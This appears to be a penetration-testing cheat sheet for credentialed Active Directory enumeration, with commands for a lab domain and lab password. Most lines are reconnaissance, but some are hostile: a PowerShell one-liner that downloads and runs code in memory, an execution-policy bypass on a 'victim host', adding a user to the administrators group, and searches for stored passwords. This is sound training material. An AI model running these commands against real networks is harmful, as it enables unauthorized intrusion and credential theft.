Credentialed Enumeration
Credentialed Enumeration - Linux
CrackMapExec
Domain User Enumeration
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users
Domain Groups Enumeration
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups
Domain Logged On Users
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users
Domain Share Searching
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
SMBMap
List Shares
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>
Recursive List Shares
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only
rpcclient
UserEnum by RID
# Inside an rpcclient session (e.g. rpcclient -U "" -N <IP>), look up a user by relative identifier
queryuser <RID>
WindapSearch
Search Domain Admins
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da
Search Privileged Users
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU
BloodHound-py
Enumerating Everything
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
Credentialed Enumeration - Windows
Active Directory PowerShell Module
# Import Module
Import-Module ActiveDirectory
Domain Info
Get-ADDomain
Users Info
Get-ADUser
Trust Relations
Get-ADTrust -Filter *
Group Info
Get-ADGroup -Filter * | select name
Detailed Group Info
Get-ADGroup -Identity <group-name>
Group Membership
Get-ADGroupMember -Identity <group-name>
PowerView
Domain Information
Get-Domain
Show Domain Controller
Get-DomainController
Show all Users
Get-DomainUser
Show All Computers
Get-DomainComputer
Show all Groups
Get-DomainGroup
Show specific OU objects in AD
Get-DomainOU
Show Specific ACLs
Find-InterestingDomainAcl
Show members of a specific domain group
Get-DomainGroupMember
Show all GPO
Get-DomainGPO
Show User GPO Rights
# Change this to the user
$sid=Convert-NameToSid "Domain Users"
# Check Rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
Show Domain Policy
Get-DomainPolicy
Show Local Groups
Get-NetLocalGroup
Show members of a specific local group
Get-NetLocalGroupMember
Show Domain Shares
Find-InterestingDomainShareFile
Find machines in the domain where the current user has local admin access
Find-LocalAdminAccess
Show Domain Trust
Get-DomainTrust
Show all forest trusts for the current forest or a specified forest
Get-ForestTrust
Map all reachable domain trusts
Get-DomainTrustMapping
Find Passwords In User Description Fields
Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}
Find Accounts With PASSWD_NOTREQD Set
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
Find Accounts With DONT_REQ_PREAUTH Set
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Snaffler
https://github.com/SnaffCon/Snaffler
Helps acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
Credentialed Enumeration With Built-In Tools
Basic Enumeration Commands
# Prints the PC's Name
hostname
# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version
# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn
PowerShell Enumeration Commands
# Lists available modules loaded for use.
Get-Module
# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List
# This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process
# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value
# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
# Firewall status for all profiles
netsh advfirewall show allprofiles
# Windows Defender status
Get-MpComputerStatus
Net Commands
# Information about password requirements
net accounts
# Password and lockout policy
net accounts /domain
# Information about domain groups
net group /domain
# List users with domain admin privileges
net group "Domain Admins" /domain
# List of PCs connected to the domain
net group "domain computers" /domain
# List computer accounts of the domain controllers
net group "Domain Controllers" /domain
# List users that belong to a given domain group
net group <domain_group_name> /domain
# List of domain groups
net groups /domain
# List users that belong to the administrators group inside the domain (the Domain Admins group is included here by default)
net localgroup administrators /domain
# Add user to administrators
net localgroup administrators [username] /add
# Check current shares
net share
# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain
# List all users of the domain
net user /domain
# Get a list of computers
net view